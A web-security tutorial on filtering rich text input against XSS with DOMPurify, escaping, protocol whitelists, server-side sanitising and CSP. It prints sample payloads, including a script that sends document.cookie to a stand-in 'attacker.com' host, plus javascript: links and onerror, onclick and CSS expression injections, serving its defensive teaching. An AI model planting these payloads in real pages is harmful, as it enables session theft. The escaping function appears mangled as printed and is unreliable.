Security handling of rich text input (such as XSS filtering)
Security Handling of Rich Text Input (e.g., XSS Filtering)
Rich text input is a common feature in web applications, allowing users to input formatted content such as bold, italics, links, etc. However, this also introduces significant security risks, particularly cross-site scripting (XSS) attacks. Attackers can inject malicious scripts to steal user data or perform unauthorized actions. Therefore, properly handling rich text input is a critical aspect of front-end security.
Basic Principles of XSS Attacks
XSS attacks are generally categorized into three types: stored, reflected, and DOM-based. Rich text input is most likely to trigger stored XSS because user-submitted content is persisted in the database and rendered on the page when accessed by other users. For example:
<script>alert('XSS');</script>
If this script is rendered directly on the page without processing, it will execute the pop-up operation. A more dangerous scenario is when an attacker steals user session information via document.cookie
:
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
Basic Strategies for Filtering Rich Text
Whitelist Filtering
Whitelist filtering is the most common defense mechanism, allowing only specific HTML tags and attributes to pass. For example, permitting basic tags like <b>
, <i>
, and <a>
, while prohibiting dangerous tags like <script>
and <iframe>
. Here’s an example using the DOMPurify library:
import DOMPurify from 'dompurify';
const dirtyHtml = '<script>alert("XSS")</script><b>Safe text</b>';
const cleanHtml = DOMPurify.sanitize(dirtyHtml, {
ALLOWED_TAGS: ['b', 'i', 'a'],
ALLOWED_ATTR: ['href', 'title']
});
console.log(cleanHtml); // Output: <b>Safe text</b>
Escaping Special Characters
For scenarios where HTML tags do not need to be preserved, special characters can be escaped directly. For example, converting <
to <
and >
to >
. This completely avoids HTML injection:
function escapeHtml(unsafe) {
return unsafe
.replace(/&/g, "&")
.replace(/</g, "<")
.replace(/>/g, ">")
.replace(/"/g, """)
.replace(/'/g, "'");
}
const userInput = '<script>alert("XSS")</script>';
console.log(escapeHtml(userInput)); // Output: <script>alert("XSS")</script>
Handling Links and Events in Rich Text
Even if <a>
tags are allowed, caution is needed for malicious content in the href
attribute, such as JavaScript protocols:
<a href="javascript:alert('XSS')">Click me</a>
A whitelist can restrict protocols to only allow http
, https
, and mailto
:
const dirtyLink = '<a href="javascript:alert(\'XSS\')">Click me</a>';
const cleanLink = DOMPurify.sanitize(dirtyLink, {
ALLOWED_TAGS: ['a'],
ALLOWED_ATTR: ['href'],
ALLOWED_URI_REGEXP: /^(https?|mailto):/i
});
console.log(cleanLink); // Output: <a>Click me</a> (href is removed)
Similarly, event attributes like onclick
and onmouseover
must be prohibited:
<div onclick="alert('XSS')">Hover me</div>
Handling CSS and Style Injection
The style
attribute in rich text can also be abused, such as executing scripts via CSS expressions or url()
:
<div style="background: expression(alert('XSS'))">Styled content</div>
The solution is to restrict the content of the style
attribute or prohibit it entirely:
const dirtyStyle = '<div style="background: expression(alert(\'XSS\'))">Content</div>';
const cleanStyle = DOMPurify.sanitize(dirtyStyle, {
ALLOWED_TAGS: ['div'],
FORBID_ATTR: ['style']
});
console.log(cleanStyle); // Output: <div>Content</div>
Server-Side and Client-Side Collaborative Defense
Front-end filtering cannot replace server-side validation. Attackers may bypass the front end and submit malicious data directly to the API. Therefore, the server must also filter rich text:
// Node.js example (using dompurify)
const express = require('express');
const DOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const app = express();
app.use(express.json());
app.post('/save-content', (req, res) => {
const dirtyHtml = req.body.content;
const window = new JSDOM('').window;
const purify = DOMPurify(window);
const cleanHtml = purify.sanitize(dirtyHtml, { ALLOWED_TAGS: ['b', 'i'] });
// Store cleanHtml in the database
res.send({ success: true });
});
Security Configuration for Rich Text Editors
Common rich text editors (e.g., TinyMCE, CKEditor) provide security configuration options. For TinyMCE:
tinymce.init({
selector: '#editor',
plugins: 'link',
valid_elements: 'b,i,a[href|title]',
valid_styles: { '*': 'color,font-size' },
content_security_policy: "script-src 'self'"
});
The Supplementary Role of Content Security Policy (CSP)
Even if rich text is filtered, CSP can serve as a last line of defense. For example, prohibiting inline scripts and executing external scripts:
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
Real-World Case Analysis
A social platform once suffered a stored XSS attack due to insufficient rich text filtering. Attackers injected the following content into user profiles:
<img src="x" onerror="stealCookies()">
The fix involved upgrading the filtering library and restricting event attributes like onerror
:
DOMPurify.sanitize(userInput, {
FORBID_ATTR: ['onerror', 'onload'],
FORBID_TAGS: ['img']
});
Continuous Monitoring and Updates
XSS attack methods evolve constantly, so filtering rules must be updated regularly. For example, SVG tags and data:
protocols have also been abused:
<svg><script>alert('XSS')</script></svg>
The solution is to update libraries like DOMPurify promptly and stay informed about new vulnerability announcements.
本站部分内容来自互联网,一切版权均归源网站或源作者所有。
如果侵犯了你的权益请来信告知我们删除。邮箱:cc@cccx.cn
上一篇:防止 NoSQL 注入的前端措施
下一篇:HTTPS 的基本原理与作用